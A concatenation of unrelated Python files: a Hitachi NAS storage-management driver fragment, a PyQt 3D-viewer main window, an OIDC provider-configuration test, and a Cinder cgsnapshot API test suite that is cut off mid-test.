alert_list.append(alert_model)
alert_model = {}
return alert_list
def list_alerts(self, query_para):
try:
command = constant.ALERT_INFO_COMMAND
if query_para and 'begin_time' in query_para:
timeArray = time.gmtime(int(query_para['begin_time']) / 1000)
begin_time = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
command += constant.ALERT_TIME % begin_time
alert_info = self.ssh_do_exec([command])
alert_array = self.get_table_data(alert_info, True)
alert_list = self.format_alert_list(alert_array, query_para)
alert_list = \
sorted(alert_list,
key=lambda x: x['occur_time'], reverse=True)
return alert_list
except exception.DelfinException as e:
err_msg = "Failed to get alerts from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get alerts from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
@staticmethod
def parse_alert(alert):
try:
alert_info = alert.get(constant.OID_TRAP_DATA)
alert_array = alert_info.split(':')
if len(alert_array) > 1:
description = alert_array[1]
alert = alert_array[0].split()
if len(alert) > 1:
alert_id = alert[0]
severity = constant.SEVERITY_MAP.get(alert[1])
if severity == constant.SEVERITY_MAP.get('Information'):
return
alert_model = {
'alert_id': alert_id,
'alert_name': alert_id,
'severity': severity,
'category': constants.Category.FAULT,
'type': constants.EventType.EQUIPMENT_ALARM,
'occur_time': utils.utcnow_ms(),
'description': description,
'match_key': hashlib.md5(
(alert_id + severity +
description).encode()).hexdigest(),
'resource_type': constants.DEFAULT_RESOURCE_TYPE,
'location': ''
}
return alert_model
except exception.DelfinException as e:
err_msg = "Failed to parse alert from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to parse alert from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def list_ports(self, storage_id):
try:
ports_list = self.get_fc_port(storage_id)
return ports_list
except exception.DelfinException as e:
err_msg = "Failed to get ports from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get ports from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def get_fc_port(self, storage_id):
try:
fc_info = self.ssh_do_exec([constant.FC_PORT_COMMAND])
fc_map_list = \
self.format_data_to_map(fc_info, 'Portname')
fc_list = []
speed_info = self.ssh_do_exec([constant.FC_SPEED_COMMAND])
speed_map_list = \
self.format_data_to_map(speed_info, 'FC1')
speed_map = speed_map_list[-1]
for value_map in fc_map_list:
if 'Portname' in value_map:
status = value_map.get('Status')
health = constants.PortHealthStatus.ABNORMAL
if status == 'Good':
health = constants.PortHealthStatus.NORMAL
connection_status = \
constants.PortConnectionStatus.DISCONNECTED
if 'FCLinkisup' in value_map:
connection_status = \
constants.PortConnectionStatus.CONNECTED
port_id = ''
for key in value_map.keys():
if 'HostPort' in key:
port_id = key.replace('HostPort', '')
break
speed = \
int(speed_map.get('FC' + port_id).replace('Gbps', ''))
fc_model = {
'name': 'FC' + port_id,
'storage_id': storage_id,
'native_port_id': port_id,
'connection_status': connection_status,
'health_status': health,
'type': constants.PortType.FC,
'speed': speed * units.G,
'max_speed': 8 * units.G,
'wwn': value_map.get('Portname'),
}
fc_list.append(fc_model)
return fc_list
except exception.DelfinException as e:
err_msg = "Failed to get fc ports from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get fc ports from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def list_filesystems(self, storage_id):
try:
fs_list = []
fs_info = self.ssh_do_exec([constant.FS_INFO_COMMAND])
fs_array = self.get_table_data(fs_info)
status_info = self.ssh_do_exec([constant.FS_STATUS_COMMAND])
status_array = self.get_table_data(status_info)
status_map = {}
for status in status_array:
status_info = status.split()
if len(status_info) > constant.FS_INDEX['status_len']:
status_map[status_info[constant.FS_INDEX['id_index']]] = \
[status_info[constant.FS_INDEX['pool_index']],
status_info[constant.FS_INDEX['status_index']]]
for fs in fs_array:
fs_info = list(filter(None, fs.split(' ')))
if len(fs_info) > constant.FS_INDEX['detail_len']:
total_capacity = \
fs_info[constant.FS_INDEX['total_index']].replace(
' ', '')
used_capacity = \
fs_info[constant.FS_INDEX['used_index']].replace(
' ', '').split('(')[0]
free_capacity = \
fs_info[constant.FS_INDEX['free_index']].replace(
' ', '').split('(')[0]
total_capacity = Tools.get_capacity_size(total_capacity)
used_capacity = Tools.get_capacity_size(used_capacity)
free_capacity = Tools.get_capacity_size(free_capacity)
volume_type = constants.VolumeType.THICK \
if fs_info[constant.FS_INDEX['type_index']] == 'No' \
else constants.VolumeType.THIN
pool_id = status_map.get(fs_info[0])[0] \
if status_map.get(fs_info[0]) else None
status = status_map.get(fs_info[0])[1] \
if status_map.get(fs_info[0]) else None
fs_model = {
'name': fs_info[1],
'storage_id': storage_id,
'native_filesystem_id': fs_info[1],
'native_pool_id': pool_id,
'status': constant.FS_STATUS_MAP[status],
'type': volume_type,
'total_capacity': total_capacity,
'used_capacity': used_capacity,
'free_capacity': free_capacity
}
fs_list.append(fs_model)
return fs_list
except exception.DelfinException as e:
err_msg = "Failed to get filesystem from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get filesystem from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def get_fs_evs(self):
fs_info = self.ssh_do_exec([constant.FS_STATUS_COMMAND])
fs_array = self.get_table_data(fs_info)
evs_list = []
for fs in fs_array:
fs_info_array = fs.split()
if len(fs_info_array) > 6:
evs_list.append([fs_info_array[0], fs_info_array[4]])
return evs_list
def list_quotas(self, storage_id):
try:
evs_list = self.get_fs_evs()
quota_list = []
for evs in evs_list:
quota_info = self.ssh_do_exec([
constant.CHECK_EVS % evs[1],
constant.QUOTA_INFO_COMMAND % evs[0]])
quota_map_list = \
self.format_data_to_map(quota_info, 'Usage')
for quota_map in quota_map_list:
quota_type = None
user_group_name = None
qtree_id = None
if 'Target' in quota_map:
if 'Group' in quota_map.get('Target'):
quota_type = constants.QuotaType.GROUP
user_group_name = \
quota_map.get('Target').replace('Group', '')
elif 'User' in quota_map.get('Target'):
quota_type = constants.QuotaType.USER
user_group_name = \
quota_map.get('Target').replace('User', '')
elif 'ViVol' in quota_map.get('Target'):
quota_type = constants.QuotaType.TREE
user_group_name = \
quota_map.get('Target').replace('ViVol', '')
qtree_id = evs[0] + '-' + user_group_name
quota_id = \
evs[0] + '-' + quota_type + '-' + user_group_name
capacity_hard_limit, capacity_soft_limit = None, None
file_soft_limit, file_hard_limit = None, None
if 'Soft' in quota_map.get('Limit'):
capacity_soft_limit = \
quota_map.get('Limit').replace('(Soft)', '')
elif 'Hard' in quota_map.get('Limit'):
capacity_hard_limit = capacity_soft_limit = \
quota_map.get('Limit').replace('(Hard)', '')
if 'Soft' in quota_map.get('Limit1'):
file_soft_limit = \
quota_map.get('Limit1').replace('(Soft)', '')
elif 'Hard' in quota_map.get('Limit1'):
file_soft_limit = file_hard_limit = \
quota_map.get('Limit1').replace('(Hard)', '')
quota = {
'native_quota_id': quota_id,
'type': quota_type,
'storage_id': storage_id,
'native_filesystem_id': evs[0],
'native_qtree_id': qtree_id,
"capacity_hard_limit": capacity_hard_limit,
'capacity_soft_limit':
Tools.get_capacity_size(capacity_soft_limit),
"file_hard_limit": file_hard_limit,
'file_soft_limit': file_soft_limit,
'file_count': quota_map.get('FileCount'),
'used_capacity':
Tools.get_capacity_size(quota_map.get('Usage')),
'user_group_name': user_group_name
}
quota_list.append(quota)
return quota_list
except exception.DelfinException as e:
err_msg = "Failed to get storage quota from " \
"hitachi nas: %s" % (six.text_type(e))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage quota from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def list_qtrees(self, storage_id):
try:
evs_list = self.get_fs_evs()
return self.get_qtree(evs_list, storage_id)
except exception.DelfinException as e:
err_msg = "Failed to get storage qtree from " \
"hitachi nas: %s" % (six.text_type(e))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage qtree from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
def get_qtree(self, evs_list, storage_id):
qtree_list = []
for evs in evs_list:
tree_info = self.ssh_do_exec([
constant.CHECK_EVS % evs[1],
constant.TREE_INFO_COMMAND % evs[0]])
tree_map_list = \
self.format_data_to_map(
tree_info, 'root', split_key='<NAME>')
for qt_map in tree_map_list:
qt_name = ''
for key in qt_map:
if qt_map[key] == '' and key != 'email':
qt_name = key
qt_id = evs[0] + '-' + qt_name
qt_model = {
'name': qt_name,
'storage_id': storage_id,
'native_qtree_id': qt_id,
'path': qt_map.get('root'),
'native_filesystem_id': evs[0],
}
qtree_list.append(qt_model)
return qtree_list
def get_cifs_share(self, evs_list, storage_id):
share_list = []
evs_array = []
for evs in evs_list:
if evs[1] not in evs_array:
evs_array.append(evs[1])
for evs in evs_array:
cifs_share = self.ssh_do_exec([
constant.CHECK_EVS % evs,
constant.CIFS_SHARE_COMMAND])
cifs_map_list = \
self.format_data_to_map(cifs_share, 'Sharename')
for cifs in cifs_map_list:
qtree_id = None
if 'VirtualVolume' in cifs.get('Sharecomment'):
qtree = cifs.get('Sharecomment').split('Volume')
if cifs.get('Filesystemlabel'):
qtree_id = \
cifs.get('Filesystemlabel') + '-' + qtree[1]
if cifs.get('Filesystemlabel'):
native_share_id = \
'%s-%s-%s' % (cifs.get('Filesystemlabel'),
cifs.get('Sharename'),
constants.ShareProtocol.CIFS),
else:
native_share_id = \
cifs.get('Sharename') + '-' + \
constants.ShareProtocol.CIFS,
share = {
'name': cifs.get('Sharename'),
'storage_id': storage_id,
'native_share_id': native_share_id,
'native_qtree_id': qtree_id,
'native_filesystem_id': cifs.get('Filesystemlabel'),
'path': cifs.get('Sharepath'),
'protocol': constants.ShareProtocol.CIFS
}
share_list.append(share)
return share_list
def get_nfs_share(self, evs_list, storage_id):
share_list = []
evs_array = []
for evs in evs_list:
if evs[1] not in evs_array:
evs_array.append(evs[1])
for evs in evs_array:
nfs_share = self.ssh_do_exec([
constant.CHECK_EVS % evs,
constant.NFS_SHARE_COMMAND])
nfs_map_list = \
self.format_data_to_map(nfs_share, 'Exportname')
qtree_list = self.get_qtree(evs_list, None)
for nfs in nfs_map_list:
qtree_id = None
for qtree in qtree_list:
if nfs.get('Exportpath') == qtree['path'] \
and qtree['native_filesystem_id'] \
== nfs.get('Filesystemlabel'):
qtree_id = qtree['native_qtree_id']
if nfs.get('Filesystemlabel'):
native_share_id = \
nfs.get('Filesystemlabel') \
+ '-' + nfs.get('Exportname') \
+ '-' + constants.ShareProtocol.NFS,
else:
native_share_id = \
nfs.get('Exportname') + '-' +\
constants.ShareProtocol.NFS,
share = {
'name': nfs.get('Exportname'),
'storage_id': storage_id,
'native_share_id': native_share_id,
'native_qtree_id': qtree_id,
'native_filesystem_id': nfs.get('Filesystemlabel'),
'path': nfs.get('Exportpath'),
'protocol': constants.ShareProtocol.NFS
}
share_list.append(share)
return share_list
def list_shares(self, storage_id):
try:
evs_list = self.get_fs_evs()
share_list = []
share_list.extend(self.get_cifs_share(evs_list, storage_id))
share_list.extend(self.get_nfs_share(evs_list, storage_id))
return share_list
except exception.DelfinException as e:
err_msg = "Failed to get storage share from " \
"hitachi nas: %s" % (six.text_type(e))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage share from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
|
<filename>src/main.py
import sys
from PyQt5 import QtWidgets, uic
from darktheme.widget_template import DarkPalette
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import Qt
import PyQt5.QtWidgets
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QColorDialog
from PyQt5.QtGui import QColor
from graphic.ui_mainwindow import Ui_MainWindow
from widgets.colordialog import MiniColorDialog
import load.load as load
################################################
from datetime import date
################################################
BACKGROUNDSTRING = "background-color: %s"
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
"""
Класс главного окна
"""
def __init__(self, *args, **kwargs):
"""
Инициализация главного окна
"""
super(MainWindow, self).__init__(*args, **kwargs)
self.setupUi(self)
self.curColor = QColor(255, 255, 255, 1)
self.colorWindow = None
self.translateVec = {"w" : False, "s" : False,
"a" : False, "d" : False}
self.setPalette(DarkPalette())
self.loadModelBtn.clicked.connect(self.load)
self.plusBtn.clicked.connect(self.scalePlus)
self.minusBtn.clicked.connect(self.scaleMinus)
self.upBtn.clicked.connect(self.moveUp)
self.downBtn.clicked.connect(self.moveDown)
self.rightBtn.clicked.connect(self.moveRight)
self.leftBtn.clicked.connect(self.moveLeft)
self.fromBtn.clicked.connect(self.moveFrom)
self.toBtn.clicked.connect(self.moveTo)
self.xLeftTurnBtn.clicked.connect(self.xLeftRotate)
self.xRightTurnBtn.clicked.connect(self.xRightRotate)
self.yUpTurnBtn.clicked.connect(self.yUpRotate)
self.yDownTurnBtn.clicked.connect(self.yDownRotate)
self.colorBtn.clicked.connect(self.chooseColor)
timer = QtCore.QTimer(self)
timer.setInterval(50)
timer.timeout.connect(self.timerActions)
timer.start()
def load(self):
load.Load('cube.obj').load()
self.GL.paintGL()
QMessageBox.warning(
self,
":(", "Уже "
+ date.today().strftime('%d.%m.%Y')
+ "!\nА эта кнопка все ещё не работает!")
def chooseColor(self):
self.colorWindow = MiniColorDialog(self)
self.colorWindow.setCurrentColor(self.curColor)
self.colorWindow.show()
def timerActions(self):
if self.colorWindow:
self.curColor = self.colorWindow.currentColor()
self.colorBtn.setStyleSheet(
BACKGROUNDSTRING % self.curColor.name()
)
self.GL.update(self.curColor.getRgbF(), self.translateVec)
def scalePlus(self):
self.GL.scale(1)
def scaleMinus(self):
self.GL.scale(-1)
def moveUp(self):
self.GL.translate((0, 0.05, 0))
def moveDown(self):
self.GL.translate((0, -0.05, 0))
def moveRight(self):
self.GL.translate((0.05, 0, 0))
def moveLeft(self):
self.GL.translate((-0.05, 0, 0))
def moveFrom(self):
self.GL.translate((0, 0, -0.05))
def moveTo(self):
self.GL.translate((0, 0, 0.05))
def xLeftRotate(self):
self.GL.rotate((0, -1, 0))
def xRightRotate(self):
self.GL.rotate((0, 1, 0))
def yUpRotate(self):
self.GL.rotate((-1, 0, 0))
def yDownRotate(self):
self.GL.rotate((1, 0, 0))
def keyPressEvent(self, event):
if event.key() == Qt.Key_W:
self.translateVec["w"] = True
elif event.key() == Qt.Key_S:
self.translateVec["s"] = True
elif event.key() == Qt.Key_A:
self.translateVec["a"] = True
elif event.key() == Qt.Key_D:
self.translateVec["d"] = True
def keyReleaseEvent(self, event):
if event.key() == Qt.Key_W:
self.translateVec["w"] = False
elif event.key() == Qt.Key_S:
self.translateVec["s"] = False
elif event.key() == Qt.Key_A:
self.translateVec["a"] = False
elif event.key() == Qt.Key_D:
self.translateVec["d"] = False
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
main.showMaximized()
sys.exit(app.exec_())
|
import json
import pytest
from oidcmsg.key_jar import build_keyjar
from oidcendpoint.oidc import userinfo
from oidcendpoint.oidc.authorization import Authorization
from oidcendpoint.oidc.provider_config import ProviderConfiguration
from oidcendpoint.oidc.registration import Registration
from oidcendpoint.oidc.token import AccessToken
from oidcendpoint.endpoint_context import EndpointContext
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
KEYJAR = build_keyjar(KEYDEFS)[1]
RESPONSE_TYPES_SUPPORTED = [
["code"], ["token"], ["id_token"], ["code", "token"], ["code", "id_token"],
["id_token", "token"], ["code", "token", "id_token"], ['none']]
CAPABILITIES = {
"response_types_supported": [" ".join(x) for x in RESPONSE_TYPES_SUPPORTED],
"token_endpoint_auth_methods_supported": [
"client_secret_post", "client_secret_basic",
"client_secret_jwt", "private_key_jwt"],
"response_modes_supported": ['query', 'fragment', 'form_post'],
"subject_types_supported": ["public", "pairwise"],
"grant_types_supported": [
"authorization_code", "implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer", "refresh_token"],
"claim_types_supported": ["normal", "aggregated", "distributed"],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
}
class TestEndpoint(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
conf = {
"issuer": "https://example.com/",
"password": "<PASSWORD>",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"verify_ssl": False,
"capabilities": CAPABILITIES,
"jwks": {
'public_path': 'jwks.json',
'local_path': 'static/jwks.json',
'private_path': 'own/jwks.json'
},
'endpoint': {
'provider_config': {
'path': '.well-known/openid-configuration',
'class': ProviderConfiguration,
'kwargs': {}
},
'registration': {
'path': 'registration',
'class': Registration,
'kwargs': {}
},
'authorization': {
'path': 'authorization',
'class': Authorization,
'kwargs': {}
},
'token': {
'path': 'token',
'class': AccessToken,
'kwargs': {}
},
'userinfo': {
'path': 'userinfo',
'class': userinfo.UserInfo,
'kwargs': {'db_file': 'users.json'}
}
},
'template_dir': 'template'
}
self.endpoint_context = EndpointContext(conf, keyjar=KEYJAR)
self.endpoint = ProviderConfiguration(self.endpoint_context)
def test_do_response(self):
args = self.endpoint.process_request()
msg = self.endpoint.do_response(args['response_args'])
assert isinstance(msg, dict)
_msg = json.loads(msg['response'])
assert _msg
assert _msg['token_endpoint'] == 'https://example.com/token'
assert _msg['jwks_uri'] == 'https://example.com/jwks.json'
assert ('Content-type', 'application/json') in msg['http_headers'] |
# Copyright (C) 2012 - 2014 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for cgsnapshot code."""
from unittest import mock
from oslo_serialization import jsonutils
from six.moves import http_client
import webob
from cinder import context
from cinder import db
from cinder import exception
from cinder.group import api as groupAPI
from cinder import objects
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import utils
import cinder.volume
class CgsnapshotsAPITestCase(test.TestCase):
"""Test Case for cgsnapshots API."""
def setUp(self):
super(CgsnapshotsAPITestCase, self).setUp()
self.volume_api = cinder.volume.API()
self.context = context.get_admin_context()
self.context.project_id = fake.PROJECT_ID
self.context.user_id = fake.USER_ID
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
def test_show_cgsnapshot(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
snapshot_id = utils.create_snapshot(
self.context,
volume_type_id=vol_type['id'],
volume_id=volume_id,
group_snapshot_id=cgsnapshot.id)['id']
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
fake.PROJECT_ID, cgsnapshot.id))
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.OK, res.status_int)
self.assertEqual('this is a test group snapshot',
res_dict['cgsnapshot']['description'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshot']['name'])
self.assertEqual('creating', res_dict['cgsnapshot']['status'])
db.snapshot_destroy(context.get_admin_context(), snapshot_id)
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
def test_show_cgsnapshot_with_cgsnapshot_NotFound(self):
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
fake.PROJECT_ID, fake.WILL_NOT_BE_FOUND_ID))
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.NOT_FOUND, res.status_int)
self.assertEqual(http_client.NOT_FOUND,
res_dict['itemNotFound']['code'])
self.assertEqual('GroupSnapshot %s could not be found.' %
fake.WILL_NOT_BE_FOUND_ID,
res_dict['itemNotFound']['message'])
def test_list_cgsnapshots_json(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot1 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
cgsnapshot2 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
cgsnapshot3 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.OK, res.status_int)
self.assertEqual(cgsnapshot3.id,
res_dict['cgsnapshots'][0]['id'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][0]['name'])
self.assertEqual(cgsnapshot2.id,
res_dict['cgsnapshots'][1]['id'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][1]['name'])
self.assertEqual(cgsnapshot1.id,
res_dict['cgsnapshots'][2]['id'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][2]['name'])
cgsnapshot3.destroy()
cgsnapshot2.destroy()
cgsnapshot1.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
def test_list_cgsnapshots_detail_json(self):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
cgsnapshot1 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
cgsnapshot2 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
cgsnapshot3 = utils.create_group_snapshot(
self.context, group_id=consistencygroup.id,
group_type_id=fake.GROUP_TYPE_ID,)
req = webob.Request.blank('/v2/%s/cgsnapshots/detail' %
fake.PROJECT_ID)
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
req.headers['Accept'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.OK, res.status_int)
self.assertEqual('this is a test group snapshot',
res_dict['cgsnapshots'][0]['description'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][0]['name'])
self.assertEqual(cgsnapshot3.id,
res_dict['cgsnapshots'][0]['id'])
self.assertEqual('creating',
res_dict['cgsnapshots'][0]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['cgsnapshots'][1]['description'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][1]['name'])
self.assertEqual(cgsnapshot2.id,
res_dict['cgsnapshots'][1]['id'])
self.assertEqual('creating',
res_dict['cgsnapshots'][1]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['cgsnapshots'][2]['description'])
self.assertEqual('test_group_snapshot',
res_dict['cgsnapshots'][2]['name'])
self.assertEqual(cgsnapshot1.id,
res_dict['cgsnapshots'][2]['id'])
self.assertEqual('creating',
res_dict['cgsnapshots'][2]['status'])
cgsnapshot3.destroy()
cgsnapshot2.destroy()
cgsnapshot1.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_create_cgsnapshot_json(self, mock_validate):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=
consistencygroup.id)['id']
body = {"cgsnapshot": {"name": "cg1",
"description":
"CG Snapshot 1",
"consistencygroup_id": consistencygroup.id}}
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.method = 'POST'
req.headers['Content-Type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.ACCEPTED, res.status_int)
self.assertIn('id', res_dict['cgsnapshot'])
self.assertTrue(mock_validate.called)
cgsnapshot = objects.GroupSnapshot.get_by_id(
context.get_admin_context(), res_dict['cgsnapshot']['id'])
cgsnapshot.destroy()
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_create_cgsnapshot_when_volume_in_error_status(self,
mock_validate):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=consistencygroup.id,
status='error')['id']
body = {"cgsnapshot": {"name": "cg1",
"description":
"CG Snapshot 1",
"consistencygroup_id": consistencygroup.id}}
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.method = 'POST'
req.headers['Content-Type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual(http_client.BAD_REQUEST,
res_dict['badRequest']['code'])
self.assertEqual(
"Invalid volume: The snapshot cannot be created when the volume "
"is in error status.",
res_dict['badRequest']['message']
)
self.assertTrue(mock_validate.called)
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
def test_create_cgsnapshot_with_no_body(self):
# omit body from the request
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.body = jsonutils.dump_as_bytes(None)
req.method = 'POST'
req.headers['Content-Type'] = 'application/json'
req.headers['Accept'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual(http_client.BAD_REQUEST,
res_dict['badRequest']['code'])
self.assertEqual("Missing required element 'cgsnapshot' in "
"request body.",
res_dict['badRequest']['message'])
@mock.patch.object(groupAPI.API, 'create_group_snapshot',
side_effect=exception.InvalidGroupSnapshot(
reason='invalid group_snapshot'))
def test_create_with_invalid_cgsnapshot(self, mock_create_cgsnapshot):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=consistencygroup.id)['id']
body = {"cgsnapshot": {"name": "cg1",
"description":
"CG Snapshot 1",
"consistencygroup_id": consistencygroup.id}}
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.body = jsonutils.dump_as_bytes(body)
req.method = 'POST'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.BAD_REQUEST, res.status_int)
self.assertEqual(http_client.BAD_REQUEST,
res_dict['badRequest']['code'])
self.assertEqual('Invalid GroupSnapshot: invalid group_snapshot',
res_dict['badRequest']['message'])
db.volume_destroy(context.get_admin_context(), volume_id)
consistencygroup.destroy()
@mock.patch.object(groupAPI.API, 'create_group_snapshot',
side_effect=exception.GroupSnapshotNotFound(
group_snapshot_id='invalid_id'))
def test_create_with_cgsnapshot_not_found(self, mock_create_cgsnapshot):
vol_type = utils.create_volume_type(context.get_admin_context(),
self, name='my_vol_type')
consistencygroup = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']])
volume_id = utils.create_volume(self.context,
volume_type_id=vol_type['id'],
group_id=consistencygroup.id)['id']
body = {"cgsnapshot": {"name": "cg1",
"description":
"CG Snapshot 1",
"consistencygroup_id": consistencygroup.id}}
req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
req.method = 'POST'
